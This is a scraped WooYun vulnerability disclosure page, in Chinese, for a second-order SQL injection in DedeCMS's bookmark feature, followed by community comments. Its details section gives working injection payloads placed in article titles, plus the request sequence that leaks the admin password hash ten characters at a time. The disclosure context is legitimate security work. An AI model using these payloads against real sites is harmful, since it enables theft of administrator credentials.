DedeCMS某功能SQL注射漏洞 | wooyun-2013-046375| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046375

漏洞标题：DedeCMS某功能SQL注射漏洞

漏洞作者： Undoit

提交时间：2013-12-18 19:27

修复时间：2014-03-15 19:28

公开时间：2014-03-15 19:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2013-12-18：细节已通知厂商并且等待厂商处理中
2013-12-23：厂商主动忽略漏洞，细节向第三方安全合作伙伴开放
2014-02-16：细节向核心白帽子及相关领域专家公开
2014-02-26：细节向普通白帽子公开
2014-03-08：细节向实习白帽子公开
2014-03-15：细节向公众公开

简要描述：

详细说明：

收藏文章功能$title变量未过滤，造成二次注入。
利用步骤(以获取dede_admin.pwd字段的值为例):
1)注册会员,登录,发表文章,文章标题为
u',char(@`'`), (select pwd from dede_admin))#
获取aid。这里aid=108

2) 提交请求：
http://u.cn/DedeCMS/plus/stow.php?aid=108&type=001
3) 访问：http://u.cn/DedeCMS/member/mystow.php
点击刚才发布的文章的“推荐“链接，打开如下连接
http://u.cn/DedeCMS/plus/recommend.php?type=29a53fb3c3&aid=108
其中type=29a53fb3c3的 29a53fb3c3 为dede_admin.pwd字段的前10位

数据库中的数据：

4) 后10位使用类似的步骤，不同的是发布的文章标题为：
u',char(@`'`),substring((select pwd from dede_admin),11))#

漏洞证明：

修复方案：

过滤

版权声明：转载请注明来源 Undoit@乌云

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2014-03-15 19:28

厂商回复：

漏洞评价：

2013-12-18 19:28 | Finger ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗，任何自称Finger并...)

靠谱！
2013-12-18 19:32 | xfkxfk ( 核心白帽子 | Rank:2179 漏洞数:338 | 呵呵！)

mark
2013-12-18 20:38 | lucky ( 普通白帽子 | Rank:409 漏洞数:84 | 三人行必有我师焉########################...)

标注一下！
2013-12-18 20:40 | gainover ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

给力啊～
2013-12-18 21:26 | 煦阳。 ( 普通白帽子 | Rank:134 漏洞数:27 | 这个人很懒，什么都没留下。)

通杀？
2013-12-18 21:27 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

mark
2013-12-18 21:49 | niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)

给力
2013-12-18 21:56 | Mosuan ( 普通白帽子 | Rank:449 漏洞数:175 | 尘封此号，不装逼了，再见孩子们。by Mosua...)

果断关注
2013-12-18 22:18 | Mas ( 实习白帽子 | Rank:42 漏洞数:15 )

忽略想都不用想
2013-12-18 23:19 | 红太阳 ( 路人 | Rank:0 漏洞数:1 | 莫欺少年穷)

这个NB
2013-12-19 09:33 | 围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)

求忽略
2013-12-19 09:57 | 松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)

求忽略
2013-12-19 10:57 | Leon ( 路人 | Rank:25 漏洞数:6 | 永无宁日啊)

求共享
2013-12-21 15:50 | 假面， ( 实习白帽子 | Rank:32 漏洞数:7 | 我是一个小小小小小sb~)

求公开
2013-12-22 11:08 | 小伟 ( 路人 | Rank:0 漏洞数:2 | )

牛逼啊
2014-01-08 00:10 | 路人丁 ( 路人 | Rank:15 漏洞数:1 | 甲乙丙丁。)

危害等级：无影响厂商忽略

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046375

漏洞标题：DedeCMS某功能SQL注射漏洞

相关厂商：Dedecms

漏洞作者： Undoit

提交时间：2013-12-18 19:27

修复时间：2014-03-15 19:28

公开时间：2014-03-15 19:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Undoit@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2013-046375

漏洞标题：DedeCMS某功能SQL注射漏洞

相关厂商：Dedecms

漏洞作者： Undoit

提交时间：2013-12-18 19:27

修复时间：2014-03-15 19:28

公开时间：2014-03-15 19:28

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：18

漏洞状态：漏洞已经通知厂商但是厂商忽略漏洞

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2013-046375"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 Undoit@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：